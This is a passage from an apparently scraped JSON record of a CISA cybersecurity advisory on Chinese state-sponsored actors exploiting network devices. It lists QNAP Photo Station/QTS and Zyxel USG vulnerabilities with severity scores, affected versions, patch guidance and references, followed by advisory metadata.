\n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier. \n \n**References **\n\n<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25> \n[http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html](<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25>) \n \n_**Table 14: Information on QNAP CVE- 2019-7193**_\n\nQNAP CVE-2019-7193 CVSS 3.0: 9.8 (Critical) \n--- \n \n**_Vulnerability Description _**\n\nThis improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the vulnerability, QNAP recommend updating QTS to their latest versions. \n \n_**Recommended Mitigations **_\n\nUpdate QTS to versions: \n\n * QTS 4.4.1 build 20190918 and later\n * QTS 4.3.6 build 20190919 and later \n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier. \n \n**_References _**\n\n<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25> \n<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html> \n \n_**Table 15: Information on QNAP CVE-2019-7194**_\n\nQNAP CVE-2019-7194 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description**_\n\nThis external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions. \n \n_**Recommended Mitigations **_\n\nUpdate Photo Station to versions: \n\n * QTS 4.4.1 Photo Station 6.0.3 and later\n * QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\n * QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\n * QTS 4.2.6 Photo Station 5.2.11 and later \n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier. \n \n_**References **_\n\n[https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 ](<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25>) \n<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html> \n \n_**Table 16: Information on QNAP CVE-2019-7195**_\n\nQNAP CVE-2019-7195 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nThis external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions. \n \n_**Recommended Mitigations **_\n\nUpdate Photo Station to versions: \n\n * QTS 4.4.1 Photo Station 6.0.3 and later\n * QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\n * QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\n * QTS 4.2.6 Photo Station 5.2.11 and later \n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier. \n \n_**References **_\n\n<https://www.qnap.com/zh-tw/security-advisory/nas-201911-25> \n<http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html> \n \n_**Table 17: Information on Zyxel CVE-2020-29583**_\n\nZyxel CVE-2020-29583 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nFirmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the SSH server or web interface with admin privileges. \n \n_**Recommended Mitigations **_\n\n * Download latest patch (4.60 Patch1 or newer) \n_**Detection Methods **_\n\n * Login attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects the following technologies and versions:\n\n * ATP series running firmware ZLD V4.60\n * USG series running firmware ZLD V4.60\n * USG FLEX series running firmware ZLD V4.60\n * VPN series running firmware ZLD V4.60\n * NXC2500 running firmware V6.00 through V6.10\n * NXC5500 running firmware V6.00 through V6.10 \n \n_**References **_\n\n<http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf> \n<https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release> \n<https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15> \n<https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html> \n<https://www.zyxel.com/support/CVE-2020-29583.shtml> \n<https://www.zyxel.com/support/security_advisories.shtml> \n \n### Revisions\n\nInitial Version: June 7, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-10T12:00:00", "type": "ics", "title": "People\u2019s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6862", "CVE-2018-0171", "CVE-2018-13382", "CVE-2018-14847", "CVE-2019-11510", "CVE-2019-15271", "CVE-2019-1652", "CVE-2019-16920", "CVE-2019-19781", "CVE-2019-7192", "CVE-2019-7193", "CVE-2019-7194", "CVE-2019-7195", "CVE-2020-29583", "CVE-2020-8515", "CVE-2021-22893", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-06-10T12:00:00", "id": "AA22-158A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}